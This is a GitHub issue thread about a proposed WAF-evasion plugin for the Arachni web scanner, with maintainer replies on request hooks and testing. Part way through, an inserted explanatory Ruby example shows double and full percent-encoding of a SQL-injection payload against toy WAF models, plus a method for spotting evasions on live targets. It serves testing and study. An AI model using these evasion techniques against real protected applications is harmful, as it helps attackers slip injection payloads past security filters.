WAF Evasion Plugin #44

Closed
msidagni opened this Issue Jun 23, 2011 · 17 comments


Create an arachni WAF evasion plugin now that you already have a WAF fingerprinting plugin. It should focus on the most common WAFs: modsecurity, F5, Imperva, etc.

@ghost ghost assigned Zapotek Jun 23, 2011

Owner

Zapotek commented Jul 9, 2011

Same thing as for Issue #46, it would be cool but Arachni is a web app scanner not a WAF scanner.

So, I'm leaving this open indefinitely.

msidagni commented Jul 9, 2011

Tasos

It's not a matter of arachni becoming a WAF scanner. It's enabling arachni
to bypass WAF filters, a feature that W3AF has already implemented, even with
limited results. This will only enhance the w3af feature set because it will
allow scanning a web app even when it is protected by a WAF.

Cheers

Michelangelo

Owner

Zapotek commented Jul 9, 2011

I disagree.
Any scan results that have been obtained while the webapp sits behind a WAF will be inaccurate, at best, which conflicts with the aim of the project.

If anyone wants to contribute such a feature-set it will be more than welcomed, in the meantime my focus stays put.

Maybe we could do some URL obfuscation modules, like double encoding, etc.

Owner

Zapotek commented Mar 28, 2012

I could add the necessary hooks to the HTTP interface to make it easier for anyone who wants to implement something like that but I'm afraid that I'll have to stand by my last reply.
Obviously, anyone who wants to develop that sort of plug-in will have my full support, but I can't spend time developing it myself.

I'll update this issue when I add the hook and a demo plug-in to show how it could work.

I can do it, since I already wrote a URL obfuscation tool in Ruby to help with some WAF evaluation. Should I do a pull request for this new plugin?

Owner

Zapotek commented Mar 28, 2012

Sure, I'll be pushing the stuff I mentioned in a while to give you an idea of how to intercept framework requests.

Zapotek added a commit that referenced this issue Mar 28, 2012

OK, it is enough to implement some evasive techniques. Maybe we can talk about how to present the configuration options on the web/CLI interface (like which kind of evasive technique the user wants to use), or should it be a boolean, and for every single request when it's enabled, we just try all the evasive options that we implement?

Owner

Zapotek commented Mar 28, 2012

The Options have been lifted from Metasploit so if you've worked with it they should be familiar.
See for example: https://github.com/Zapotek/arachni/blob/experimental/plugins/vector_feed.rb#L217
These are the available options: https://github.com/Zapotek/arachni/blob/experimental/lib/arachni/component_options.rb

Owner

Zapotek commented Mar 28, 2012

Also, you can add obf sub-components for your plug-in, i.e. make your plug-in modular.
If that interests you I can write up a demo for that as well, it's really simple.

OK. I will first get it done, then we talk about it again.

Owner

Zapotek commented Mar 29, 2012

I'm guessing that the origin of the HTTP request would also be helpful to you (i.e. which component queued it) so if/when you need it let me know, it shouldn't be hard to implement.

yup. Your demo plugin is enough. I just have to clean up a backlog before (day job)

vpereira commented Apr 2, 2012

Hi, I did implement three obfuscation methods, two URL encoding and one about HTTP pipelining. The main question is: what do we want to test? How I do it today: I get a WAF, I configure a rule that I know will be blocked, and then I obfuscate it and try to evade the WAF. The point is, how should we do it here? See if we get different responses for obfuscated GETs and for normal GETs? Any idea?
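The double-encoding idea raised earlier in the thread and the "compare obfuscated against normal requests" question above can be tried offline without a real WAF. The following is an added example for this discussion, not vpereira's plugin or any Arachni code: the two WAF classes are toy stand-ins written here (one decodes the query string once before matching, the other decodes until the string is stable), the `PAYLOAD` and `RULE` are constructed for the example, and `evasions` is the differential check, reporting which encodings get past a filter that does block the plain form of the same payload.

```ruby
require 'cgi'
require 'uri'

# Added example (not Arachni code). The WAF models below are stand-ins
# written for this example; real products behave differently.

# Constructed sample payload that a typical SQLi signature would block.
PAYLOAD = "' or 1=1 --".freeze

# Constructed signature standing in for a WAF rule.
RULE = /'\s*or\s+1=1|union\s+select|<script/i

module Obfuscate
  # Standard form-encoding, as a scanner would normally send it.
  def self.plain(s)
    CGI.escape(s)
  end

  # Double encoding: encode once, then re-encode the '%' signs (%27 -> %2527).
  # A filter that decodes only once sees "%27" where the quote should be.
  def self.double(s)
    CGI.escape(s).gsub('%', '%25')
  end

  # Percent-encode every byte, alphanumerics included ("o" -> %6F).
  # Still a single layer of encoding, so a one-pass decoder recovers the payload.
  def self.full(s)
    s.bytes.map { |b| format('%%%02X', b) }.join
  end

  VARIANTS = { double: method(:double), full: method(:full) }.freeze
end

# Toy one-pass WAF: decodes the query string once, then matches the rule.
class NaiveWaf
  def blocked?(raw_query)
    RULE.match?(URI.decode_www_form_component(raw_query))
  end
end

# Toy normalising WAF: decodes until the string stops changing (bounded),
# then matches the rule on the fully decoded value.
class NormalizingWaf
  MAX_ROUNDS = 3

  def blocked?(raw_query)
    s = raw_query
    MAX_ROUNDS.times do
      begin
        d = URI.decode_www_form_component(s)
      rescue ArgumentError
        break # decoded data no longer looks like valid %-encoding; stop here
      end
      break if d == s
      s = d
    end
    RULE.match?(s)
  end
end

# Differential check: the encodings the WAF lets through even though it
# blocks the plain encoding of the same payload. If the plain form is not
# blocked, there is nothing to evade and the result is empty.
def evasions(waf, payload)
  return [] unless waf.blocked?(Obfuscate.plain(payload))
  Obfuscate::VARIANTS.reject { |_, enc| waf.blocked?(enc.call(payload)) }.keys
end

if __FILE__ == $PROGRAM_NAME
  [NaiveWaf, NormalizingWaf].each do |klass|
    puts "#{klass}: evaded by #{evasions(klass.new, PAYLOAD).inspect}"
  end
end
```

Against a live target the same shape applies: send the plain request as the baseline, send each variant, and treat a variant that returns the backend's normal response where the plain request drew the WAF's block page as a candidate evasion. Whether the backend actually decodes the extra layer is a separate question; the check above only tells you the filter did not see the payload.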

Owner

Zapotek commented Apr 2, 2012

Add your spec in:
spec/arachni/plugins/<name>_spec.rb

Add your test server (which I'm guessing would have to emulate the WAF rules you're trying to evade) in:
spec/servers/arachni/plugins/<name>.rb

These folders don't exist atm because I haven't yet made it to the plugin specs.
Look around in the specs a bit to see how spec/server relationships work, it should be easy to grasp.

Let me know if you need any help.

vpereira commented Apr 2, 2012

ok

Owner

Zapotek commented Jun 29, 2013

Since I'm not particularly fond of this feature and no contribution was made by a 3rd party, closing this for good.

@Zapotek Zapotek closed this Jun 29, 2013
